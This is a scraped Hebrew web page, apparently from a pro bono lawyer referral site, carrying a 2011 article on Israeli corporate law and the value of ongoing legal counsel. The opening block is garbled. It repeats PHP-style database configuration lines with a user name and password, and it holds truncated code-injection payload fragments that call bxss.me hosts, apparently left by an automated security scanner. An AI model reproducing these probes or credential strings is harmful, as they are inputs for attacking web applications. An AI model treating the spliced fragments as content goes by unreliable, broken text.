$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_u $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> ?>; $db_name = "1"; ?>b_name = "1"; ?>esb9769.bxss.me.')[3].to_s)+'"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>; ?>'hiteptjlxcjea2c2f9.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> דיני תאגידים - עורכי דין פרובונו למענך
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
יצירת קשר
חיפוש באתר
מאמרים אחרונים

כל מה שחשוב לדעת על דיני תאגידים בישראל

תאריך: 27/03/2011 12:10   מחבר: מערכת פרובונו

מהו תאגיד?

תאגיד הוא גוף מאוגד, המהווה ישות משפטית אשר עומדת בפני עצמה.

משמעות הדבר הינה, כי התאגיד הינו בעל יכולת לבצע פעולות, לשאת בחובות ולהיות זכאי לזכויות.

ישות התאגיד נפרדת מבעליה, חבריה או מחזיקי מניות בתאגיד - על כן, פעולות התאגיד מחייבות את התאגיד בלבד וקיימת חציצה בינו לבין מנהליו או בעליו.

אופן ההתאגדות הרווח ביותר הינו החברה ומכאן מכונים דיני תאגידים גם דיני חברות.

ענף דיני התאגידים

דיני התאגידים הינם שם התחום המשפטי אשר מסדיר את כלל ההיבטים המשפטיים הנוגעים לחברות ואת הסביבה בה הן פועלות.

עולם המשפט התאגידי מלווה את החברה עוד טרם היוולדה, כאשר בשלב זה עולות דילמות שונות, למשל כיצד לרשום את התאגיד - כאגודה שיתופית או חברה? היכן להתאגד? - שאלה מהותית בהיבט שיקולי מס וסוגיות נוספות אשר ישפיעו על החברה לאורך חייה.

על כן, קיימת חשיבות מהותית לקבלת יעוץ משפטי מקצועי לאורך מסלול פעילות החברה ובמהלך התנהלותה השוטפת.

בחיי החברה ישנן מספר נקודות עיקריות בהן מתקיים ממשק בין התנהלות החברה לבין העולם המשפטי של דיני התאגידים. זאת בין היתר, בהיבטי הקמת החברה, שותפויות, מיזוגים, הנפקת מניות, רכישת חברות ונכסים, פירוק חברה ועוד.

חשיבות קבלת סיוע משפטי

תמיכה משפטית מקצועית הינה כלי ממדרגה ראשונה, המאפשר לחברה להתמודד בשווקים תחרותיים בהם קיים משקל גבוה לרגולציה קפדנית המשתנה לעיתים.

לכן, מתעורר צורך בסיוע של עורך דין מקצועי הבקי ברזי דיני התאגידים, מתעדכן תדירות בשינויים חקיקתיים ויכול באמצעות ידע זה ליתן כלים משמעותיים שיוכלו לתמוך בהתנהלות החברה.

עלות הליווי המשפטי בטלה לעומת היתרונות הגלומים בו: נוכח אינספור המכשולים והסיכונים אשר עומדים בפני חברה, גובה סכום הנזקים האפשריים עולה בהרבה על עלותו של ייעוץ שוטף.

ההשלכות המשפטיות על התנהלות החברה מושפעות מגודל הארגון, השווקים בהם הוא פועל והמוצרים או השירותים אותם הוא מספק.

עורך הדין המלווה את החברה נוטל על עצמו את הפן המשפטי ומאפשר לקברניטי החברה להתנהל ללא חשש מהשלכות משפטיות של מעשיהם.

נוכח האמור, נהוג שעורך הדין לוקח חלק פעיל בהתנהלותה השוטפת של החברה לרבות התקשרויות עם ארגונים וחברות חיצוניים.

עורך הדין יכול לשמש גם כנכס אסטרטגי לחברה. הידע המשפטי מהווה נדבך נוסף לתכנון האסטרטגי של החברה לרבות בחינת חוזים ועסקאות מורכבות, הערכת סיכונים בהשקעות והלוואות ועוד.

הייעוץ המשפטי יכול להינתן על ידי גורם חיצוני לחברה ככל נותן שירות אחר או לחלופין להתבסס על יכולות פנים חברתיות, כלומר עורך דין המועסק על ידי החברה באופן קבוע.

איזו חברה זקוקה לליווי משפטי?

כל עסק, ארגון או חברה ללא חשיבות לגודלם, מיקומם והמוצר או השירות אותו הם מציעים, זקוקים לליווי משפטי צמוד ועקבי.

אמנם, הצרכים של כל חברה שונים ואינדיבידואליים, אך העולם המשפטי של דיני התאגידים הינו סבוך ומורכב וחל על כל החברות ללא יוצא דופן ומכאן נגזרת חשיבות קבלת ייעוץ משפטי שוטף מטעם עורכי דין המתמחים בתחום זה.

לקבלת סיוע משפטי אנא פנה אלינו באמצעות טופס יצירת הקשר באתר.

הפניה מתבצעת בחינם ותנותב לעורך דין המתמחה בדיני תאגידים, אשר ילווה אותך למן היעוץ הראשוני ולאורך שלביו השונים של ההליך.

קיראו מידע ומאמרים נוספים באתר
החברה שייסדת עומדת בפני סיום דרכה העסקית? - עורך דין פרובונו לפירוק חברה - על אופני פירוק חברה, הטעמים השכיחים לכך וקבלת ייעוץ משפטי חינם, במאמר המלא...
נושא משרה בתאגיד - חובות והגנות בחוק - עורך דין פרובונו דיני תאגידים - על החובות אשר חלות על נושאי משרה בתאגיד וקבלת יעוץ משפטי חינם, במאמר המלא...
ליחצו כאן להוספת תגובה
סגורסגור